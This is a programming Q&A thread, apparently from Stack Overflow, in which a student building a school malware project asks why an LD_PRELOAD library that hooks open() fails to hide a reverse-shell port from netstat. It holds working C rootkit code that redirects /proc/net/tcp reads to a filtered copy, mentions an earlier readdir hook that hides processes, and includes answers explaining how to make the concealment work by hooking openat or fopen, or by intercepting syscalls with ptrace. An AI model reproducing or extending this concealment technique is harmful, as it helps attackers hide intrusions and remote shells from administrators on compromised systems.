# Override open function using LD_PRELOAD

Tags: c, port, ld-preload

I already made a library that i override the readdir function and I use it to cover up some processes, and now am trying to override the open function, in order to hide a port that is opened, this is part of a project i have in school that i have to open a revershell connection and cover it up.
netstat is using open function to read from /proc/net/tcp and display the open connections. I want when the /proc/net/tcp file is tryed to be opened to open a file that has all the contents of the /proc/net/tcp file but not the line that contains the port that i am connected with the reverse shell. The file is already made and is in this path /home/kali/Malware/project/hide_port/tcp.

I made this program in c

```
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
    
static int (*original_open)(const char *pathname, int flags, ...) = NULL;
static int redirected_fd = -1;
    
int open(const char *pathname, int flags, ...) {
    // Load the original open function if not loaded
    if (!original_open) {
        original_open = dlsym(RTLD_NEXT, "open");
        if (!original_open) {
            fprintf(stderr, "Error: Unable to load original open function\n");
            return -1;
        }
    }
    
    // Check if the file being opened is /proc/net/tcp
    if (strcmp(pathname, "/proc/net/tcp") == 0) {
        // If not already redirected, open the new file
        if (redirected_fd == -1) {
            redirected_fd = original_open("/home/kali/Malware/project/hide_port/tcp", O_RDONLY);
            if (redirected_fd == -1) {
                fprintf(stderr, "Error: Unable to open /home/kali/Malware/project/hide_port/tcp\n");
                return -1;
            }
        }
    
        // Return the redirected file descriptor
        return redirected_fd;
    } else {
        // Call the original open function for other files
        return original_open(pathname, flags);
    }
}
```

and then i compile it like this
`gcc -shared -fPIC -o libnetstat_hide.so hide_sshd.c -ldl`

and am running the netstat like this but am still getting the line that reference to the connection

`LD_PRELOAD=./libnetstat_hide.so netstat`

Comment: When you call `original_open()` in the `else` block, you don't pass the optional third argument if it was supplied. This probably isn't a problem with `netstat`, since it shouldn't open any files for writing.

Comment: Make sure `netstat` isn't set-uid, `LD_PRELOAD` is ignored.

Comment: @Barmar I runned as root user this command LD_PRELOAD=./libnetstat_hide.so netstat but still i get the line

Answer (score 1, accepted):

What I did:

1. I built your `.so` and added debug `printf`.
2. I invoked `netstat` using the `LD_PRELOAD`
3. Your intercept `open` function was *not* called (i.e. no debug `printf` output).
4. I reran all this under `strace`
5. I examined the `strace` output

The simple answer is that `netstat` uses `openat` and *not* `open` for all its open calls.

---

Here is the partial `strace` output:

```
914095 1700075180.092774 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/tcp", O_RDONLY) = 3
914095 1700075180.709689 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/tcp6", O_RDONLY) = 3
914095 1700075181.104876 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/sctp/eps", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.104939 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/sctp6/eps", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.104993 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/sctp/assocs", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.105047 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/sctp6/assocs", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.105099 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/udp", O_RDONLY) = 3
914095 1700075181.105471 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/udp6", O_RDONLY) = 3
914095 1700075181.105813 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/udplite", O_RDONLY) = 3
914095 1700075181.106036 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/udplite6", O_RDONLY) = 3
914095 1700075181.106262 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/raw", O_RDONLY) = 3
914095 1700075181.106438 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/raw6", O_RDONLY) = 3
914095 1700075181.106630 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/unix", O_RDONLY) = 3
914095 1700075181.118744 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/ipx/socket", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.118799 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/ipx", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.118853 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/ax25", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.118913 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/x25", O_RDONLY) = -1 ENOENT (No such file or directory)
914095 1700075181.118965 [00007f80464adcb2] openat(AT_FDCWD, "/proc/net/nr", O_RDONLY) = -1 ENOENT (No such file or directory)
```

---

**UPDATE:**

I've done a bunch of testing. It appears that `netstat` uses `fopen`. So, overriding `open` [et. al.] won't work because glibc's `fopen` will use the *internal* version of `open`. So, we'd probably need to intercept `fopen` instead.

But, due to the way `glibc` is constructed, the actual symbol is somewhat unclear. It could be `fopen64`, with or without symbol versioning (e.g. `fopen64@GLIBC_2.2.5`), `_IO_new_fopen` or just `fopen`.

A simpler way may be to run `netstat` under a custom `ptrace` program. That will intercept at the syscall level. It will catch things no matter what `*open` call(s) `netstat` uses.

See my answer:
[Forcing `pthread_create` to fail for test purposes](https://stackoverflow.com/a/77247274/5382650) for an example of how to intercept syscalls.

Comment: you are right, changed it to override openat, also i made some modifications to the hide_sshd.c , am testing it on a program that is opening the /proc/net/tcp like this 
openat(AT_FDCWD, "/proc/net/tcp", O_RDONLY); , when am LD_PRELAOD the lib with the test program i manage to overide the function but when am doing it for netstat am not getting the result i want. So maybe i have to find another way to hide the port?

Comment: here is a github repo with the changes https://github.com/kolokasi1/hide_port